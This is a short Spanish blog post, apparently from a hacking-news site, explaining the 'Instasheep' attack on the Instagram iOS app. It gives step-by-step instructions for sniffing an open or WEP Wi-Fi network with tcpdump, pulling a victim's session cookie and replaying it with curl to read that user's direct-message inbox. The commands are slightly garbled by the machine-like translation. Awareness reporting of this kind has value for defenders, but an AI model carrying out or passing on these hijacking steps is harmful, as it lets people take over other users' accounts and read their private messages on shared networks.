Instagram utiliza HTTP para comunicarse con sus servidores. La comunicación incluye los nombres de cuenta de usuario, y un número de cuenta de la identificación. Las credenciales, como la contraseña se comunican a través de una línea segura, pero cuando la información se pasa de nuevo...
Cómo funciona Instasheep
La información se almacena en una cookie, que se puede utilizar en la misma red sin reautenticación.
- Salta sobre un cifrado del punto de acceso Wi-Fi abierto o WEP
- Ponga tu interfaz de red en modo de lectura filtrando en i.instagram.com: sudo tcpdump-In-i en0-s 2048-A dst i.instagram.com
- Espere a que alguien use la aplicación Instagram iOS en la misma red
- Extrae el encabezado de la solicitud de la Cookie de la salida resultante
- Utiliza el parámetro correspondiente a la Cookie que haga cualquier llamada a la API como ese usuario Incluso https puntos finales, como mensajes directos: curl-H 'User-Agent: Instagram 6.0.4 (iPhone6, 2; iPhone OS 7_1_1; en_GB, en-GB) AppleWebKit/420 +'-H 'Cookie: SessionID = EXPURGADO' https://i.instagram.com / api/v1/direct_share/inbox / `
- Esto devuelve la bandeja de entrada de mensajes directos del usuario como JSON (JavaScript Object Notation).
Desde SOLUCIONAHACK quiero manteneros informado de todo tipo noticias sobre el Hacking en general para poder estar alerta.
Fuente: Cyberwarzone
No hay comentarios:
Publicar un comentario